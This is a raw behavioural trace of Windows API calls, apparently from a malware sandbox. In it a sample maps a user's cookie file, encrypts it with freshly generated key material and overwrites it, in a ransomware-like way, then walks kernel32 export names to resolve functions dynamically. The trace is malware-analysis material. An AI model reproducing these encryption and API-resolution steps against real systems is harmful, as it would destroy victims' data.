76 [0079.517] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@msn[1].txt") returned 31 [0079.517] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.517] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@msn[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" [0079.517] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.517] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@msn[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.517] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=823) returned 1 [0079.517] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.517] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.518] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.518] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.518] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.519] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.519] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.519] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.520] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.520] CloseHandle (hObject=0x464) returned 1 [0079.520] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.520] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.521] CloseHandle (hObject=0x0) returned 0 [0079.521] CloseHandle (hObject=0x460) returned 1 [0079.522] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.522] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.522] GetTickCount () returned 0x114c5ee [0079.522] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.522] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.523] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.523] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.523] lstrlenA (lpString="kernel32.dll") returned 12 [0079.523] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.523] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.523] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.523] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.523] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.523] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.523] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.523] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.523] lstrlenA (lpString="ADDATOMA") returned 8 [0079.523] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.523] lstrlenA (lpString="ADDATOMW") returned 8 [0079.523] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.523] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.523] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.524] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.524] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.524] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.524] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.524] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.524] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.524] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.524] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.524] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.524] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.524] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.524] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.524] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.524] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.524] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.524] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.524] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.524] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.524] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.525] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.525] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.525] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.525] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.525] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.525] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.525] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.525] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.525] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.525] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.525] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.526] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.526] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.526] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.526] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.526] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.526] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.526] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.526] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.526] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.526] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.526] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.526] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.526] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.526] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.526] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.526] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.526] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.526] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.526] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.526] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.527] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.527] lstrlenA (lpString="BEEP") returned 4 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.527] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.527] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.527] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.527] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.527] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.527] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.527] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.527] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.527] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.527] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.527] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.527] lstrlenA (lpString="CANCELIO") returned 8 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.527] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.527] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.527] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.527] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.528] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.528] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.528] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.528] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.528] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.528] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.528] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.528] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.528] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.528] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.528] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.528] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.528] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.528] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.528] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.528] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.528] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.528] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.528] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.529] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.529] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.529] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.529] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.529] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.529] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.529] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.529] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.529] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.529] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.529] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.529] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.529] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.529] lstrlenA (lpString="COMPARESTRINGW") returned 14 